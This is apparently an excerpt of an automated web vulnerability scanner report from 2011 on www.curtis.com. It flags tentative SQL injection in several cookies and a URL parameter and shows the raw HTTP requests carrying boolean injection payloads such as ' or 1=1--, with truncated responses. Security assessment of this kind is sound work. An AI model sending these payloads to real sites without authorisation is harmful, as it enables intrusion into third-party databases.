Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /sifr3/gillsans.swf14043355'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.57. http://www.curtis.com/sitecontent.cfm [CFID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 18432304%20or%201%3d1--%20 and 18432304%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=617584318432304%20or%201%3d1--%20; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Sun, 18-Apr-2010 17:01:03 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=617584318432304%20or%201%3d2--%20; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175952;path=/
Set-Cookie: CFTOKEN=14488976;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::offices::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.l
...[SNIP]...

1.58. http://www.curtis.com/sitecontent.cfm [CFTOKEN cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 90677941%20or%201%3d1--%20 and 90677941%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=3257569790677941%20or%201%3d1--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Sun, 18-Apr-2010 17:01:13 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=3257569790677941%20or%201%3d2--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175975;path=/
Set-Cookie: CFTOKEN=25170816;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::offices::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.l
...[SNIP]...

1.59. http://www.curtis.com/sitecontent.cfm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15382433'%20or%201%3d1--%20 and 15382433'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm15382433'%20or%201%3d1--%20?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /sitecontent.cfm15382433'%20or%201%3d2--%20?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.60. http://www.curtis.com/sitecontent.cfm [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 74416649'%20or%201%3d1--%20 and 74416649'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.174416649'%20or%201%3d1--%20; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Sun, 18-Apr-2010 17:00:58 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.174416649'%20or%201%3d2--%20; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::professionals::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearc
...[SNIP]...

1.61. http://www.curtis.com/sitecontent.cfm [__utmb cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 13432204'%20or%201%3d1--%20 and 13432204'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.130314580313432204'%20or%201%3d1--%20; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Sun, 18-Apr-2010 17:01:18 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.130314580313432204'%20or%201%3d2--%20; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
